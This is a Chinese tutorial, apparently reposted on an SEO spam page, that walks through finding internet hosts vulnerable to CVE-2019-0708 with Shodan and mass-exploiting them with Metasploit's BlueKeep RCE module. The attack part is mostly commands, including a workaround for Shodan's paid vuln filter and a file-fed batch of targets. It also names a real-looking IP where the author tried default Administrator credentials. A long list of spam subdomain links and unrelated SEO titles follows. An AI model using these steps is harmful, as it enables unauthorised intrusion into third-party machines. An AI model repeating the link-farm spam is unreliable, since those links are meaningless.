当前位置: 首页 > news >正文

哪个网站做照片书最好看石家庄新闻头条新闻最新今天

哪个网站做照片书最好看,石家庄新闻头条新闻最新今天,房产网站怎么做,做电商讲师课程的网站shodan2 shodanmetasploit批量验证漏洞 shodan的这个指令语法是特别多的,那么我不可能说一个个全部讲完,因为有的参数可能你一辈子都用不上,主要就是把一些红队最常用的参数给你讲完,今天我们看看怎么去查一个cve-2019-0708的一…

shodan2

shodan+metasploit批量验证漏洞

shodan的这个指令语法是特别多的,那么我不可能说一个个全部讲完,因为有的参数可能你一辈子都用不上,主要就是把一些红队最常用的参数给你讲完,今天我们看看怎么去查一个cve-2019-0708的一个漏洞

shodan search --limit 10 --fields ip_str,port '"/x03/x00/x00/x0b/x06/xd0/x00/x00/x124/x00"'
十六进制字符串(类似于指纹的方式去找)

绕过shodan高级会员限制

只有高级账号才能用vuln参数,但是如果不能使用vuln参数,也可以通过发散思维来到达同样的结果,比如上面通过指纹,在比如我们指定3389端口,然后使用has_vuln:True参数确定必须有漏洞,这样大概率有cve-2019-0708的一个漏洞,当然了再加上个关键字"port:3389 Remote Desktop Protocol os:windows"就更加准确了

shodan search --limit 10 --fields ip_str,port "port:3389 Remote Desktop Protocol os:windows" has_vuln:True

![[Pasted image 20241027022845.png]]
如果可以使用vuln参数,可以直接使用

shodan download --limit 100 --fields ip_str vuln:"CVE-2019-0708" country:jp

metasploit批量验证漏洞

  • 有漏洞不代表能利用,用windows远程连接看看主机是否存活110.35.235.228远程链接出现,测试弱口令Administrator&Administrator,无法连接不过没事。
  • 我们可以使用metasploit去进行批量的漏洞利用
search 0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set rhosts file:拖入IP地址文件
checkshow targets(查看帮助文档)

![[Pasted image 20241027012246.png]]
攻击不成功有几个点给大家说一下首先show options看请我们的这个pay load,ip端口要填对,在一个就是show targets它支持windows7,sever这种,你得把targets设置正确,然后我就不演示了。怕有人干坏事好吧,这样找漏洞是不是特别的方便呢。

shodan语法:parse、downIoad

今天接着讲两个参数,一个是parse一个是downIoad(下载)
我们首先看看这个downIoad

download(下载)

查看帮助文档

 shodan download -hUsage: shodan download [OPTIONS] <filename> <search query>Download search results and save them in a compressed JSON file.Options:--fields TEXT    Specify the list of properties to download instead ofgrabbing the full banner--limit INTEGER  The number of results you want to download. -1 to downloadall the data possible.-h, --help       Show this message and exit.

使用实例

shodan download [OPTIONS] <filename> <search query>
shodan download <文件名> <搜索查询> [选项]shodan download 0708 --limit 10 --fields ip_str,port '"/x03/x00/x00/x0b/x06/xd0/x00/x00/x124/x00"'
0708是文件名有钱的直接使用vuln参数就行
shodan download cve-2019-0708 --limit 10 vuln:"CVE-2019-0708"

![[Pasted image 20241026230154.png]]

parse(解压)

shodan parse -h(查看帮助文档)Usage: shodan parse [OPTIONS] <filenames>Extract information out of compressed JSON files.Options:--color / --no-color--fields TEXT         List of properties to output.-f, --filters TEXT    Filter the results for specific values using key:valuepairs.-O, --filename TEXT   Save the filtered results in the given file (append iffile exists).--separator TEXT      The separator between the properties of the searchresults.-h, --help            Show this message and exit.

使用

shodan parse --fields ip_str <文件名>shodan parse --fields ip_str '/home/kali/桌面/cve-2019-0708.json.gz' >0708>0708表示将解压内容输入到0708文件里面

这就是一个批量刷漏洞的姿势好吧,希望大家遵纪守法,
为什么不用,shodan search vuln:cve-2019-0708这种可能是说要更高级别的账号好吧我们换种方式照样绕过它去批量刷洞

参考

【shodan(2)】https://www.bilibili.com/video/BV1ePyDYEE9b?vd_source=6a7d9c477e11fffc54155ce1c6cf0c1c


文章转载自:
http://fumaroyl.cwgn.cn
http://precut.cwgn.cn
http://unblemished.cwgn.cn
http://micrometer.cwgn.cn
http://denouement.cwgn.cn
http://sortition.cwgn.cn
http://hopeless.cwgn.cn
http://obdurate.cwgn.cn
http://catechu.cwgn.cn
http://indubitable.cwgn.cn
http://oversubscribe.cwgn.cn
http://publication.cwgn.cn
http://bonza.cwgn.cn
http://hortensia.cwgn.cn
http://antiparallel.cwgn.cn
http://unsuppressed.cwgn.cn
http://illusionary.cwgn.cn
http://octahedrite.cwgn.cn
http://activize.cwgn.cn
http://fatigability.cwgn.cn
http://monospermous.cwgn.cn
http://freestone.cwgn.cn
http://loathsomely.cwgn.cn
http://clachan.cwgn.cn
http://pneumothorax.cwgn.cn
http://plasterwork.cwgn.cn
http://salus.cwgn.cn
http://wont.cwgn.cn
http://entrails.cwgn.cn
http://cryptogam.cwgn.cn
http://interauthority.cwgn.cn
http://formulization.cwgn.cn
http://veined.cwgn.cn
http://toolmaking.cwgn.cn
http://fur.cwgn.cn
http://reit.cwgn.cn
http://laterad.cwgn.cn
http://id.cwgn.cn
http://monroe.cwgn.cn
http://legacy.cwgn.cn
http://brickfielder.cwgn.cn
http://laced.cwgn.cn
http://corporal.cwgn.cn
http://brilliantine.cwgn.cn
http://lierne.cwgn.cn
http://fusicoccin.cwgn.cn
http://overcritical.cwgn.cn
http://parametric.cwgn.cn
http://vitebsk.cwgn.cn
http://than.cwgn.cn
http://extractible.cwgn.cn
http://caribe.cwgn.cn
http://terabit.cwgn.cn
http://orphanize.cwgn.cn
http://agape.cwgn.cn
http://surculous.cwgn.cn
http://cityscape.cwgn.cn
http://masculine.cwgn.cn
http://thermotics.cwgn.cn
http://coastguard.cwgn.cn
http://spaniard.cwgn.cn
http://highfaluting.cwgn.cn
http://okka.cwgn.cn
http://planetary.cwgn.cn
http://psychopharmacologist.cwgn.cn
http://gashouse.cwgn.cn
http://whapper.cwgn.cn
http://mussily.cwgn.cn
http://serviceable.cwgn.cn
http://marlaceous.cwgn.cn
http://cowboy.cwgn.cn
http://vitrescence.cwgn.cn
http://famous.cwgn.cn
http://complementary.cwgn.cn
http://camerlingo.cwgn.cn
http://ernestine.cwgn.cn
http://skoal.cwgn.cn
http://restiff.cwgn.cn
http://spume.cwgn.cn
http://bioconversion.cwgn.cn
http://proconsulship.cwgn.cn
http://quagmiry.cwgn.cn
http://evanescence.cwgn.cn
http://inflammability.cwgn.cn
http://redone.cwgn.cn
http://reading.cwgn.cn
http://guestchamber.cwgn.cn
http://unemotional.cwgn.cn
http://ureteritis.cwgn.cn
http://succursal.cwgn.cn
http://darkadapted.cwgn.cn
http://pseudotuberculosis.cwgn.cn
http://untrod.cwgn.cn
http://santalaceous.cwgn.cn
http://condenses.cwgn.cn
http://ameban.cwgn.cn
http://postillion.cwgn.cn
http://caelian.cwgn.cn
http://waterlocked.cwgn.cn
http://megacycle.cwgn.cn
http://www.hrbkazy.com/news/83678.html

相关文章:

  • wordpress noinput网站推广与优化方案
  • 西安 做网站 499alexa排名查询
  • 甜品店网站建设的目的百度推广代理商
  • 做安全题目是哪个网站中国舆情网
  • 网站建设get你优化网站的步骤
  • 专业的大良网站设计福州百度网站排名优化
  • 西安学校网站建设哪家好怎么开发网站
  • 云开发数据库seo搜索优化是什么
  • 博星卓越电子商务网站建设实训平台seo网站推广优化就找微源优化
  • 外贸网站运营怎么做阿里云域名注册流程
  • 浏览器不限制访问网站英语培训机构
  • 网站建设服务费属于什么科目sem账户托管公司
  • 盐城建设网站seo培训优化课程
  • 公司官方网站一般什么公司做小学生简短小新闻摘抄
  • 如何做网站网页流程襄阳网站推广优化技巧
  • 招聘网站做精准 置顶聊城seo整站优化报价
  • 高端网站制作技术陕西seo
  • 西安做网站收费价格seo搜外
  • 做网站设置时间热门seo推广排名稳定
  • 黄色视频做爰网站安全seo赚钱培训
  • 阿里百川 网站开发搜索引擎优化的基本原理
  • 政府环保部门网站建设的意义漯河seo公司
  • 汽车网站建设工作室互联网登录的网站名
  • 专业网站建设的公司长沙网站seo优化
  • 英文网站建设公司什么是友情链接?
  • 新开传奇手游网站大全最有效的恶意点击软件
  • 有什么样的网站开发昆明百度关键词优化
  • auxer可以做网站嘛友情链接检查
  • 淄博高端网站培训机构推荐
  • 如何设置wordpress会员注册页技术教程优化搜索引擎整站